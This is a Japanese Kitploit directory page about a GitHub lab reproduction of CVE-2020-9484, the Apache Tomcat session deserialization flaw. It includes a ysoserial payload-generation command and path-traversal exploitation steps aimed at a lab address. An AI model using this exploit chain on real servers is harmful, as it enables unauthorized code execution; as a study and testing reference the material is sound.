Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-9484 — Kali 2.0 で Apache Tomcat Session の逆シリアル化コード実行脆弱性を再現 | Kitploit
ツール/GitHubGitHub/idealdreamlast/cve-2020-9484
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubidealdreamlast/cve-2020-9484

CVE-2020-9484

Kali 2.0 で Apache Tomcat Session の逆シリアル化コード実行脆弱性を再現

リポジトリを見る
52206年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-9484

Kali 2.0 を使用して Apache Tomcat Session の逆シリアル化コード実行脆弱性 CVE-2020-9484 を再現

環境:

  1. Kali 2.0
  2. apache-tomcat-7.0.61-CVE-2020-9484.tar.gz(webapp は s2-053 で、その lib ディレクトリに commons-collections4-4.0.jar を追加しました)

起動

/yourtomcatdir/bin/startup.sh image

ペイロード生成

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session

エクスプロイト

まず S2-053 にアクセスして正常に起動しているか確認します: http://192.168.152.128:8080/s2-053/ image
再度アクセスしてパケットをキャプチャし、intruder を使用してパストラバーサルを行います image
image


コマンドの実行に成功: image



参考: https://mp.weixin.qq.com/s/OGdHSwqydiDqe-BUkheTGg
ツールをダウンロード